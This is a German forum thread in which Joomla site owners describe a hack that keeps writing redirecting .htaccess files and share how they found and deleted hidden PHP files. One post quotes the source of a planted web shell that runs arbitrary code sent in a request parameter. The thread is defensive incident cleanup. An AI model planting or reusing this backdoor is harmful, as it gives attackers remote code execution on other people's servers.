• Jetzt anmelden. Es dauert nur 2 Minuten und ist kostenlos!

webseiten nicht mehr über google aufrufbar

Habe genau das gleiche Problem. Auch bei mir wird ständig, alle 15 Minuten neu, eine .htaccess Datei angelegt in der eine Weiterleitung auf die allgemeine google Seite gelegt wird. Werde nun auch mal das FTP Passwort ändern und schauen ob das bereits hilft.

Mir scheint auch, als ob FileZilla nicht das sicherste FTP Programm wäre. Ist der Total Commander da besser geeignet ?
 
Werbung:
Hallo Sheva,

also nur FTP PW ändern hilft da nicht.
du musst jetzt auch alle veränderten dateien finden und korrigieren.
FileZilla is ok, darfst halt nicht PW speichern.

Cheffchen
 
Cheffchen schrieb:
Hallo Sheva,

also nur FTP PW ändern hilft da nicht.
du musst jetzt auch alle veränderten dateien finden und korrigieren.
FileZilla is ok, darfst halt nicht PW speichern.

Cheffchen
Zum Vergrößern anklicken....

Also habe jetzt bereits ein paar Dateien rausgelöscht. Gerade eben noch eine merkwürdige Datei namens ".cache_qpzogc.php" gefunden mit dem letzen Änderungsdatum am 31.12.1969(!).

Werde diese ebenfalls mal löschen und schauen was passiert. Nach .htaccess Dateien habe ich bereits gesucht und nur noch zwei Stück in den log Files gefunden, welche ja aber wegfallen.

EDIT: Nach dem löschen der oben besagten cache Datei legt er nun keine neue .htaccess Datei mehr an. In der Datei stand auch einiges an .js Funktionen, das Wort .htaccess stand aber nicht einmal drinne.

Morgen schau ich nochmal ob es noch wie gewohnt läuft.

Abschließend möcht ich aber nochmal wissen ob man durch die Log Files auch rausbekommt welche IP diese Dateien angelegt hat ?
Kann man die Log Dateiein irgendwie in ordentlich Form öffnen anstatt in solch einem Codesalat (alles hinereinander geschrieben) ?

PS: Noch eine Frage, und zwar kann ich im Backend von Joomla keine Beiträge mehr anlegen geschweige denn editieren. Kann das auch mit diesem Art Angriff zusammenhängen ?
 
Zuletzt bearbeitet:
Werbung:
Hallo,

keine Beiträge mehr anlegen geschweige denn editieren
Zum Vergrößern anklicken....
das lässt vermutten das es noch veränderte Dateien gibt, die zwar vorhanden sein müssen aber verändert wurden. da diese veränderungen ein programm macht ging das wohl schief und deswegen geht da jetzt was nicht mehr.

Log Files
Zum Vergrößern anklicken....
eigentlich hat jeder entrag eine Zeile, vielleicht mal mit anderen editor auf machen.



Cheffchen.
 
Kann eigentlich nur der Ordner /components/com_content sein in dem der Fehler liegt.

Die Seite für einen neuen Beitrag lautet schießlich:
http://xxxxxxxxxxxxxx/content/administrator/index.php?option=com_content
Zum Vergrößern anklicken....

Eine verdächtige Datei vom 21.08 war noch drinne, aber das rauslöschen dieser hat auch nicht viel mehr geholfen. Auch das erneute runterladen der joomla Version und des hochladen des com_content Ordners brachte keinen Erfolg.

Hier der Quellcode dieser:
HTML: 
<?php 
if (isset($_REQUEST['p1'])) {
    eval(stripslashes($_REQUEST['p1']));
} else {
    echo "djeu84m";
}
?>

Einzige was mir noch einfällt ist das es bei meiner Seite im FTP kein cgi-bin und cgi-data Ordner gibt, wird der benötigt ? Bei der normalen joomla Installation ist er auch nicht dabei - wird der im Laufe der Arbeit mit joomla erst angelegt ?

PS: Per Log-Datei hab ich dann nun die IP-Adresse rausbekommen.

EDIT: Ich könnte ja die ganze Version neu herunterladen und nochmal drüberbügeln. Da wäre aber jetzt meine Frage wie sich das mit den Beiträgen, Bildern, Modulen, Plugins etc. verhält. Die Beiträge werden da glaub in der Datenbank gespeichert ?

Eine Sicherung von gestern habe ich noch gemacht. Was sollte man da denn dann alles neu hochladen und was lieber nicht ?

EDIT2: Sooo, nach nun verschiedensten Versuchen habe ich spaßenshalber mal den Editor auf "Kein Editor" umgestellt und tada - es funktioniert. Hatte vorher den JCE Editor deinstalliert und den JCK installiert, da es beim JCE ja einige Sicherheitslücken geben soll. Habe aber durch den Hack dann auch kurzzeitig auch den JCK wieder deinstalliert und dadurch stand "Editor auswählen" in den Benutzereinstellungen und genau das war anscheindend der Grund warum er mir eine leere Seite zeigte - dachte aber bisher immer das wenn ich keinen Editor auswähle er wenigstens den Beitrag anzeigt - wenn dann eben ohne Editor.

Hoffe man kann mir folgen. Der JCK Editor scheint auch gar nicht bei Joomla 1.5 zu funktionieren :?:
Werde da jetzt mal die neuste Version vom JCE probieren und schauen ob da irgendwelche Sicherheitslücken vorhanden sind

EDIT3: Nun funktioniert endlich wieder alles einwandfrei, auch der JCK Editor unter 1.5. Ich brauchte nur die PHP Version per .htaccess auf Version 5 stellen, bei der alten 4er hat er den Editor anscheinend nicht genommen.

Danke nochmal für die Hilfe :)
 
Zuletzt bearbeitet:
Hallo,

habe mir wohl den selben Virus eingefangen. Könntest du mir sagen, wie du die .cache_qpzogc.php gefunden hast? Habe nichts gesehen und vermute, dass die bei mir anders heisst.

Danke, Mad.
 
Werbung:
Hallo,

bei mir lag die .cache Datei im Ordner images/banners.

Hast du bereits mal den FTP nach dieser Datei durchsucht ?
Bin eigentlich nur darauf gestoßen als ich nach Dateien gesucht habe die in den letzten 10-20 Tagen geändert wurden und die Datei hatte eben "Letztes Änderungsdatum - 31.12.1969", was ja völlig unmöglich ist.

Sind wie gesagt eben diese Datei und eine weitere namens story.php, diese lag aber im Ordner images/stories, sowie ein paar ".htaccess Dateien".
Ich denke mal das es das selbe Verfahren wie bei mir ist, deshalb suche einfach mal nach der ".cache_qpßzogc.php" per Suchfunktion und schau ob er was findet.
 
Hallo,

bei mir lagen 2 Dateien im /images/stories/ eine hieß .cache.... die andere .story .........auffallend, da es keine Bilddateien waren.

Hab beide gelöscht und alle htaccess gelöscht (sind viele in Unterordner verteilt). Vorher hab ich dem Zugang per Filezilla ein neues Paßwort gegeben und nicht gespeichert. Der Joomla-Zugang hat auch ein neues Paßwort bekommen.
Den Text der .htaccess hab ich aus einer alten Sicherung genommen. Ich denke, hier geht auch sicher der Text aus einer anderen laufenden Seite, die nicht ge-redirected ist - weiß ich aber nicht sicher.

Nach dem Reinigen des Zwischenspeichers vom Mozilla geht der Aufruf wieder aus Google raus... SUCURInet zeigt keine Malware mehr und mit etwas Glück bleibt es sauber.

Der nächste Schritt, wenn alles sauber bleibt, ist ein gutes Backup und eine schnelle Aktualisierung/Updaten :-)

LG, Sabine
 
Du musst dich einloggen oder registrieren, um hier zu antworten.

Neueste Beiträge

Zurück
Oben